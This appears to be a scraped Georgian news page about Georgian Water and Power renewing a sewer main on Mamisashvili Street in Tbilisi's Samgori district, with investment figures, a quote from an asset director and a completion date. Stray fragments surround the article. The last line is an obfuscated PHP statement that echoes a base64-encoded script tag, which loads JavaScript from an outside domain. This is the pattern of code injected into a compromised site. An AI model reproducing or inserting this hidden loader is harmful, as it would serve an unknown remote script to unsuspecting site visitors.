celsiusi
ავერსი შნაიდერი

ჯორჯიან უოთერ ენდ ფაუერი წყალმომარაგების ქსელის სისტემური გაუმჯობესების მიზნით Სამგორის რაიონში, მამისაშვილის ქუჩაზე წყალარინების ქსელს აახლებს. რეაბილიტაციის ფარგლებში  იცვლება 1 კილომეტრზე მეტი სიგრძის მოძველებული წყალარინების მაგისტრალური ქსელი, ახალ ქსელზე 22 წყალარინების ჭა დამონტაჟდება. პროექტში კომპანია  900 000 ლარამდე ინვესტიციას ახორციელებს.

ჯივიპი აქტიურად აგრძელებს მოძველებული ქსელების შეცვლა-განახლებას, ახლა ჩვენ ვიმყოფებით სამგორის რაიონში, მამისაშვილის ქუჩაზე, სადაც უკვე ხუთი თვეა წყალარინების მოძველებული ქსელის შესაცვლელად მასშტაბური  რეაბილიტაცია მიმდინარეობს. აღნიშნული ქსელი იყო ამორტიზირებული და მოსახლეობას ხშირად უქმნიდა დისკომფორტს. პროექტი დასრულების ეტაპზეა, შეიცვლება 1 კილომეტრზე მეტი სიგრძის წყალარინების ქსელი,  რის შემდეგაც სამგორის რაიონში მამისაშვილის ქუჩისა და მიმდებარე ქუჩების მოსახლეობას მნიშვნელოვნად გაუუმჯობესდება მომსახურება” -გიგა ნადირაძე, ჯივიპის აქტივების მართვის დირექტორი

Მამისაშვილის ქუჩაზე მიმდინარე სარეაბილიტაციო სამუშაოები სექტემბრის ბოლოს დასრულდება. 

წყალმომარაგებისა და წყალარინების ინფრასტრუქტურის განახლება და განვითარება ჯივიპის ერთ-ერთი პრიორიტეტული მიმართულებაა. სარეაბილიტაციო სამუშაოებს კომპანია ყოველწლიურად, გეგმის მიხედვით, აქტიურად რეჟიმში  განახორციელებს.

97
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");